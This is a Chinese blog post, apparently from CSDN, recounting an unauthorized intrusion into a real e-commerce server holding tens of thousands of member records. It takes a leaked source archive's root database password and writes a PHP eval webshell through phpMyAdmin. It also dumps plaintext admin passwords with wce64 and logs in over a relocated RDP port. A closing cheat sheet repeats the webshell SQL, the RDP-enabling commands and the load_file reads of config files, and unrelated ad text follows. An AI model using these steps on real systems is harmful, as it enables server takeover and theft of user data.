源代码泄露获取某电子商务网站服务器权限

源代码泄露获取某电子商务网站服务器权限
simeon
渗透本次目标事发偶然,通过shadon对“phpMyAdmin”关键字进行检索时,加入“index Of”关键字后,会出现所有存在列目录漏洞的网站,该网站为电子商务网站,网站保留有数万会员真实信息,下面将整过渗透过程进行分享。
1.发现目标
通过shadon搜索引擎对搜索记录逐个打开,发现某目标站点存在文件目录泄露漏洞:
http://203...227/
http://203...227/www.
.hk.rar
http://203.
.
.227/phpMyAdmin/
http://203.
..227/newshk/
目录还有phpinfo.php文件,看到phpMyAdmin和phpinfo.php同时存在,感觉服务器权限已经不远了,如图1所示,有网站源代码打包文件,将其下载到本地。
在这里插入图片描述
图1文件泄露
2.查看源代码打包文件
整个源代码压缩包2.37 GB,真大!通过搜索和查看,确定数据库配置文件为config.php
如图2所示,将其解压到本地,使用notepad进行查看,果然其中包含了数据库配置信息,而且还是root帐号,密码虽然算弱口令,但也是弱口令中的强口令。
在这里插入图片描述
图2寻找数据库配置文件
在这里插入图片描述
图3获取数据库root帐号和密码
3.寻找网站物理路径
通过phpinfo.php文件查看,在浏览器中可以使用Ctrl+F快捷键搜索关键字“SCRIPT_FILENAME”获取其真实物理路径地址,_SERVER[“SCRIPT_FILENAME”] D:/WWW/phpinfo.php,如图4所示。
在这里插入图片描述
图4获取网站物理路劲
4.Mysql直接导出Webshell
通过获取的root帐号和密码登录http://203.
.
.227/phpMyAdmin/,成功登录,如图5所示,选择SQL查询,在其中查询select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php’导出一句话后门。
在这里插入图片描述
图5登录mysql数据库
在这里插入图片描述
图6查询导出一句话后门
6.获取webshell
在浏览器中对http://203.
..227地址刷新即可获取一句话后门文件地址:http://203...227/p.php,在浏览器中打开进行访问,一切正常。使用中国菜刀一句话后门管理软件,shell添加并打开,如图7所示,顺利获取webshell
在这里插入图片描述
图7获取webshell
7.服务器提权
目测该系统php运行权限为系统权限,上传wce64.exe,然后在终端管理中输入“wce64 -w”命令成功获取管理员帐号密码,如图8所示。
在这里插入图片描述
图8获取管理员密码
8.获取3389端口
在终端管理器中执行netstat -an |find “3389”,无结果显示,估计管理员修改了默认端口,使用tasklist /svc命令获取进程名称和服务,找到termservice所对应的进程号,可以直接使用命令 tasklist /svc | find"termService"来获取对应的PID号,如图9所示,在本例中对应的ID号是1340。
在这里插入图片描述
图9获取远程终端服务对应的PID值
然后使用“netstat -ano”命令寻找1340对应的端口号,如图10所示,对应的TCP端口为7755端口,也可以使用命令netstat -ano | find '1340’命令直接显示。
在这里插入图片描述
图10获取终端服务对应的端口
9.登录远程终端
在命令提示符下输入mstsc.exe,打开远程终端登陆器,在3389远程桌面登录中的地址中输入“203.
..227:7755”,然后使用获取的管理员密码成功登录系统,如图11所示。
在这里插入图片描述
图11成功登录系统
10.域名反查
打开http://www.yougetsignal.com/tools/web-sites-on-web-server/网站对IP地址203.*..227进行域名反查,如图12所示,该IP下存在网站,打开该网站,该网站为一个电子商务网站,在该网站中存在数万会员资料,如图13所示。
在这里插入图片描述
图12域名反查
在这里插入图片描述
图13存在1万多条会员信息
11.渗透总结与思考
对存在phpMyAdmin的站点,通过代码泄露等方法来获取数据库的密码,然后通过读取文件或者导出文件来获取webshell。
(1)3389端口命令行下获取总结
netstat -an |find “3389” 查看3389端口是否开放
tasklist /svc | find “TermService” 获取对应TermService的PID号
netstat -ano | find ‘1340’ 查看上面获取的PID号对应的TCP端口号
(2)Windows 2008Server命令行开启3389
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =‘RDP-Tcp’) call setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v
(3)wce64 -w 命令直接获取系统明文登录密码
(4)在phpinfo中查找SCRIPT_FILENAME关键字获取真实路径
(5)phpmyadmin一句话后门导出
select ‘<?php @eval($_POST[pass]);?>‘INTO OUTFILE ‘d:/www/p.php’
(6)phpstudy敏感配置文件
select load_file(’ D:\phpStudy\Lighttpd\conf\vhosts.conf ‘);
select load_file(’ D:\phpStudy\Lighttpd\conf\ lighttpd.conf ‘);
select load_file(’ D:\phpStudy\Apache\conf\vhosts.conf’);
select load_file(’ D:\phpStudy\Apache\conf\httpd.conf’);
select load_file(‘c:\boot.ini’);
select load_file(‘c:\boot.ini’);
select load_file(’ D:\phpStudy\MySQL\my.ini’);
更多攻防内容请欢迎访问本人在csdn上面创造的个人专栏:
密码安全攻防技术精讲》:https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983

① 系统环境:Windows/Mac ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、Mysql ⑥ JDK版本:JDK1.8 ⑦ Maven包:Maven3.6 ⑧ 数据库:mysql 5.7 ⑨ 服务平台:Tomcat 8.0/9.0 ⑩ 数据库工具:SQLyog/Navicat ⑪ 开发软件:eclipse/myeclipse/idea ⑫ 浏览器:谷歌浏览器/微软edge/火狐 ⑬ 技术栈:Java、Mysql、Maven、Springboot、Mybatis、Ajax、Vue等 2、适用人群:计算机,电子信息工程等专业的学习者等, 高分毕业设计项目,也可作为课程设计和期末大作业。本资源仅是代码的压缩包,该代码适合毕业设计、课程设计作业,所有源码均经过严格测试,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答! 3、解压说明:本资源需要电脑端使用WinRAR、7zip、Bandizip等解压工具进行解压 4、最新计算机软件毕业设计选题大全 https://blog.csdn.net/weixin_45630258/article/details/135901374 5、系统的实现说明 摘 要 I 目 录 III 第1章 绪论 1 1.1选题动因 1 1.2背景与意义 1 第2章 相关技术介绍 3 2.1 MySQL数据库 3 2.2 Vue前端技术 3 2.3 B/S架构模式 4 2.4 ElementUI介绍 4 第3章 系统分析 5 3.1 可行性分析 5 3.1.1技术可行性 5 3.1.2经济可行性 5 3.1.3运行可行性 6 3.2 系统流程 6 3.2.1 操作信息流程 6 3.2.2 登录信息流程 6 3.2.3 删除信息流程 7 3.3 性能需求 7 第4章 系统设计 8 4.1系统整体结构 8 4.2系统功能设计 9 4.3数据库设计 9 第5章 系统的实现 20 5.1用户信息管理 20 5.2 图片素材管理 20 5.3视频素材管理 21 5.1公告信息管理 22 第6章 系统的测试 24 6.1软件测试 24 6.2测试环境 24 6.3测试测试用例 24 6.4测试结果 25
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是simeon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值